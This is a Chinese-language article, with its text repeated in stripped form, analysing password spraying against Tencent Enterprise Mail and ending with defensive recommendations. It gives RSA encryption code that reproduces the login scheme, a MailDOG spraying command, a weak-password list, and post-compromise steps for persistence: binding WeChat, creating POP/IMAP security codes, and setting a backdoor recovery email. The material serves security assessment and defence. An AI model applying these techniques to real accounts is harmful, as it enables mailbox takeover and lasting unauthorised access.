某企业邮箱攻击面之密码喷洒
字数 886 2025-08-27 12:33:54

企业邮箱密码喷洒攻击技术分析与防御指南

0x01 前言

企业邮箱作为企业内外沟通的重要渠道,往往成为攻击者的重点目标。本文详细分析腾讯企业邮箱的登录机制及密码喷洒攻击技术,并提供相应的防御措施。

0x02 腾讯企业邮箱登录机制分析

认证方式限制

  • POP3/SMTP限制:只有绑定了微信登录且开启了安全码(16位数字加大小写字母)才允许通过995、465端口进行认证
  • 安全码特性:16位随机字符串(字母数字混合),基本排除暴力破解可能

Web端登录加密机制

前端使用RSA加密传输凭证,关键参数:

var PublicKey = "CF87D7B4C864F4842F1D337491A48FFF54B73A17300E8E42FA365420393AC0346AE55D8AFAD975DFA175FAF0106CBA81AF1DDE4ACEC284DAC6ED9A0D8FEB1CC070733C58213EFFED46529C54CEA06D774E3CC7E073346AEBD6C66FC973F299EB74738E400B22B1E7CDC54E71AED059D228DFEB5B29C530FF341502AE56DDCFE9";
var RSA = new RSAKey();
RSA.setPublic(PublicKey, "10001");

加密对象格式:passwd\ntimestamp\n

防爆破机制

  • 10分钟内错误登录三次触发验证码
  • 需要精确的密码本进行有效攻击

0x03 密码喷洒技术实现

RSA加密实现方案

Python2实现

import sys
from binascii import a2b_hex, b2a_hex
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
from Crypto.Util.number import bytes_to_long

def encrypt_with_modulus(content, modulus=None):
    e = long(0x10001)
    n = bytes_to_long(a2b_hex(modulus))
    rsa_key = RSA.construct((n, e))
    public_key = rsa_key.publickey()
    cipher = PKCS1_v1_5.new(public_key)
    content = cipher.encrypt(content)
    content = b2a_hex(content)
    return str(content)

Python3实现

def encrypt_with_modulus(e, n, content):
    e = int(e, 16)
    n = int(n, 16)
    pub_key = rsa.PublicKey(e=e, n=n)
    m = rsa.encrypt(content.encode(), pub_key)
    return m.hex()

爆破工具MailDOG使用

工具地址:https://github.com/R1card0-tutu/MailDOG

基本命令:

python3 MailDOG.py --domain="exmail.qq.com" --mailadd="mail.txt" --passwd="1qaz@WSX" run

0x04 后渗透利用技术

1. 绑定微信

  • 如果目标账号未绑定微信,可直接扫码绑定
  • 无二次验证机制

2. 设置安全码

  • 生成16位安全码(字母数字混合)
  • 启用后可通过POP/IMAP协议收发邮件
  • 注意尝试不同端口(SSL和非SSL)

3. 设置密保邮箱

  • 当目标未绑定手机号时可用
  • 路径:账户 > 账户安全 > 设置密保邮箱
  • 作为持久化后门使用

0x05 企业邮箱安全自查清单

关键检查项

  1. 微信绑定状态检查
  2. 安全码设置情况检查
  3. 密保邮箱设置检查

常见弱密码清单

1qaz@WSX
目标域名@年份
目标域名#年份
Passw@rd
Passw0rd1
P@ssw0rd

防御建议

  1. 强化密码策略

    • 强制使用复杂密码(长度12+,大小写字母、数字、特殊字符组合)
    • 定期更换密码

  2. 多因素认证

    • 启用短信/邮箱/OTP等多因素认证
    • 对敏感操作增加二次验证

  3. 登录限制

    • 限制同一IP的登录尝试频率
    • 对异常登录行为进行检测和告警

  4. 账户安全设置

    • 强制绑定手机号
    • 禁用未使用的协议(POP3/IMAP等)
    • 定期审计账户安全设置

  5. 安全意识培训

    • 教育员工识别钓鱼攻击
    • 禁止密码重复使用

通过以上措施可有效防御密码喷洒攻击,保护企业邮箱安全。

企业邮箱密码喷洒攻击技术分析与防御指南 0x01 前言 企业邮箱作为企业内外沟通的重要渠道,往往成为攻击者的重点目标。本文详细分析腾讯企业邮箱的登录机制及密码喷洒攻击技术,并提供相应的防御措施。 0x02 腾讯企业邮箱登录机制分析 认证方式限制 POP3/SMTP限制 :只有绑定了微信登录且开启了安全码(16位数字加大小写字母)才允许通过995、465端口进行认证 安全码特性 :16位随机字符串(字母数字混合),基本排除暴力破解可能 Web端登录加密机制 前端使用RSA加密传输凭证,关键参数: 加密对象格式: passwd\ntimestamp\n 防爆破机制 10分钟内错误登录三次触发验证码 需要精确的密码本进行有效攻击 0x03 密码喷洒技术实现 RSA加密实现方案 Python2实现 Python3实现 爆破工具MailDOG使用 工具地址:https://github.com/R1card0-tutu/MailDOG 基本命令: 0x04 后渗透利用技术 1. 绑定微信 如果目标账号未绑定微信,可直接扫码绑定 无二次验证机制 2. 设置安全码 生成16位安全码(字母数字混合) 启用后可通过POP/IMAP协议收发邮件 注意尝试不同端口(SSL和非SSL) 3. 设置密保邮箱 当目标未绑定手机号时可用 路径:账户 > 账户安全 > 设置密保邮箱 作为持久化后门使用 0x05 企业邮箱安全自查清单 关键检查项 微信绑定状态检查 安全码设置情况检查 密保邮箱设置检查 常见弱密码清单 防御建议 强化密码策略 : 强制使用复杂密码(长度12+,大小写字母、数字、特殊字符组合) 定期更换密码 多因素认证 : 启用短信/邮箱/OTP等多因素认证 对敏感操作增加二次验证 登录限制 : 限制同一IP的登录尝试频率 对异常登录行为进行检测和告警 账户安全设置 : 强制绑定手机号 禁用未使用的协议(POP3/IMAP等) 定期审计账户安全设置 安全意识培训 : 教育员工识别钓鱼攻击 禁止密码重复使用 通过以上措施可有效防御密码喷洒攻击,保护企业邮箱安全。